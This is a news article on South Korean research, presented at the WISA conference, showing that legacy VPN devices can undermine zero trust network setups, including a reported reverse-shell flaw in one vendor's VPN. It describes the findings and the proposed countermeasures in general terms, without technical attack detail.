As the shift toward a zero trust security model gains momentum in the United States and beyond, South Korean researchers have found that even existing network safeguards, like virtual private networks (VPNs), still pose a security risk to this emerging framework.
In a series of experiments using configurations of current VPN technology, the researchers successfully breached a zero trust security environment, gaining administrative access that enabled them to remotely infiltrate systems.
Kim Eunyoung, a Principal Researcher at the National Security Research Institute’s (NSR) Cyber Security Research Division, unveiled her latest findings at the World Conference on Information Security Applications (WISA). The conference was held from August 23 to 25 on Jeju Island, South Korea. Collaborating with her on this research was Sohn Kiwook, a Computer Science and Engineering professor at Seoul National University of Science and Technology, who previously served as a director at NSR.
In a research paper published through WISA, titled “Research on Security Threats Using VPN in Zero Trust Environments,” the two researchers carried out a series of experiments and firmware analyses. Their goal was to pinpoint security vulnerabilities in Zero Trust Network Access (ZTNA) systems, with a particular focus on current network equipment.
“Despite the adoption of zero trust in many network environments, existing firewall or VPN devices are still in use,” said Kim while introducing the research. “We attempted to examine potential security threats that zero trust environments may encounter due to vulnerabilities in these existing network devices and propose countermeasures to mitigate such threats,” she elaborated.
The U.S. National Institute of Standards and Technology (NIST) defines zero trust as “the term for an evolving set of cybersecurity paradigms that move defenses from static, network-based perimeters to focus on users, assets, and resources.” Interest in the security framework has surged within global tech circles ever since the Biden administration signaled its intention to adopt zero trust policies through an executive order aimed at bolstering the nation’s cybersecurity in May 2021.
According to the researchers, the zero trust maturity model consists of five pillars: identity, device, network and environment, application workload, and data. “Although the five pillars provide a solid foundation for organizations to improve their security posture, there is no one-size-fits-all approach,” explained Kim. The researcher went on, adding that “most of the proposed models for zero trust have primarily focused on access control for end devices and access data by strengthening user authentication.”
Starting with the premise that security threats could still arise even under a zero trust framework, Kim and Sohn conducted simulations based on vulnerability-focused attack scenarios. They compared Google’s Beyond Corp with Netflix’s Location Independent Security Access (LISA). To validate their findings, the researchers zeroed in on models similar to Netflix’s LISA, which they suspected could inherit either undisclosed or publicly disclosed vulnerabilities from existing network devices. This focus contrasted with Google’s Beyond Corp approach, which eliminates VPNs and firewalls from the equation.
Additionally, the researchers put one company’s VPN equipment under the microscope and discovered a flaw that “allows an attacker to obtain a reverse shell by executing a command that connects to it” even within a zero trust framework. A reverse shell is a hacking technique that exploits a system’s vulnerabilities, ultimately granting threat-actors unauthorized access to the targeted device.
“Although ordinary users may not have a significant impact on the system as a whole, even if they are subject to hacking attacks from external sources in a zero trust environment, vulnerability attacks on users with administrator privileges can cause many problems throughout the system,” warned Kim. “When introducing the new zero trust framework, real-time monitoring of abnormal user behavior and security measures should be reviewed for all network equipment rather than simply strengthening user authentication with a more robust policy.”
